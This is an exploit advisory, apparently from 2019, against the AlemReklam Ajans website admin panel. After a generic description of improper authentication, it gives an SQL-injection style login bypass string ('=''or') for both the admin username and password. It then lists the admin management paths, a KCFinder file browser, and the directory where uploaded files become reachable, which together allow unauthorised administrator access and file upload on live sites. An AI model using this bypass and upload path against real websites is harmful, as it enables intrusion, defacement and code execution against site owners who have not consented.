####################################################################
# Exploit Title : AlemReklam Ajans Improper Authentication File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 16/08/2019
# Vendor Homepage : alemreklam.com.tr
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-287 [ Improper Authentication ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Impact :
***********
Authentication is any process by which a system verifies the identity of a user
who wishes to access it.
When an actor claims to have a given identity, the software does not prove or insufficiently
proves that the claim is correct and besides it allows upload a file on the system
without administrator permission.
Improper authentication occurs when an application improperly verifies the identity of a user.
A software incorrectly validates user's login information and as a result, an attacker can
gain certain privileges within the application or disclose sensitive information that allows
them to access sensitive data and provoke arbitrary code execution.
The weakness is introduced during Architecture and Design, Implementation stages.
####################################################################
# Authentication Bypass / Admin Panel Login Bypass Exploit :
******************************************************
© 2015 Alem Reklam,Tüm Hakkı Saklıdır ®
Admin Panel Login Path :
/admin
Admin Username : '=''or'
Admin Password : '=''or'
/admin/index.php?git=hesabim&islem=sifre
/admin/index.php?git=hesabim&islem=kullanici
/admin/index.php?git=hesabim&islem=mail
/admin/index.php?git=kategori_yonetimi
/admin/index.php?git=banner_yonetimi
/admin/index.php?git=duyuru_yonetimi
/admin/index.php?git=sayfa_yonetimi
/admin/index.php?git=belge_yonetimi
/admin/index.php?git=urun_yonetimi
/admin/index.php?git=referans_yonetimi
/admin/index.php?git=iletisim_yonetimi
/admin/index.php?git=mail_yonetimi
/admin/index.php?git=seo_yonetimi
/admin/index.php?git=maps_yonetimi
/admin/kcfinder/browse.php
/admin/kcfinder/upload/files/[yourfilename].html
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################